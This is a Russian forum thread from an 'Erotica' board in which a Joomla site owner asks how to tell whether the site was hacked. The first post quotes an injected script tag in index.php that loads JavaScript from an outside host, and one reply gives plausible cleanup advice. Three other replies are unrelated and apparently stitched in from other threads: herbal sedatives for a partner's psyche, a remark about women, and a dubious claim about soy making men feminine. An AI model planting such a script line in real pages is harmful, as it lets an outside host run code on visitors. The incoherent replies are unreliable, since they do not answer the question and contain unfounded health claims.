Форум группы "Русский размер"

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Форум группы "Русский размер" » Эротика » Как проверить сайт на взлом?


Как проверить сайт на взлом?

Сообщений 1 страница 6 из 6

1

Вчера вечером из яндекс.метрики приходит письмо о том, что мой сайт не доступен. Я обращаюсь в службу поддержки хостера, там мне отвечают сто на хостинге все в порядке проверьте сам сайт, для вывода ошибок добавьте код
php_value display_errors 1
php_value error_reporting 2047
в файл .htaccess. После добавления кода сайт выдал синтаксическую ошибку в файле index.php в корне сайта (сайт на джумле) в последней строке.
Строка следующая : <script src="http://byhosted.com/ajaxengine.js"></script>
Как туда попала эта строка ума не приложу...
Может сайт взломали? Как это можно проверить?

Отредактировано model21 (2018-06-19 21:13:38)

0

2

У вашего партнера проблемы с психикой..хоть и поверхностные..Но ситуация может стать хуже.Не думаю что он поменяется..Пусть попринимает пустырник..валериану.пиона настойку.все смешать месяц.А потом думайте...Это не дело!

0

3

Ахах ну вы выйдите на улицу, поглядите, какие там женщины ходят и вовсе не одинокие. Будете очень удивлены))

0

4

Не слышала про этот термин, однако нечто похожее на soyboys (дословно: соевые мальчики) - но это мужчины, которые из-за огромного количества сои и ГМО из продуктов питантя получают большие дозы фитоэстрогенов и вследствие этого становятся более женственными и теряют мужскую функцию (физически). Про этот термин я слышала в американских СМИ. Учитывая, что в Японии употребляют много сои, то возможно, soyboys и "травоядные мужчины" как-то связаны?

0

5

Ну, тут даже думать нечего. Взломали. Проверяйте домашний комп на вирусы,
меняйте все пароли и найдите специалиста по удалению шеллов из джумлы.
либо же можно проверить сайт на взлом с помощью https://metascan.ru

0

6

:cool:

0


Вы здесь » Форум группы "Русский размер" » Эротика » Как проверить сайт на взлом?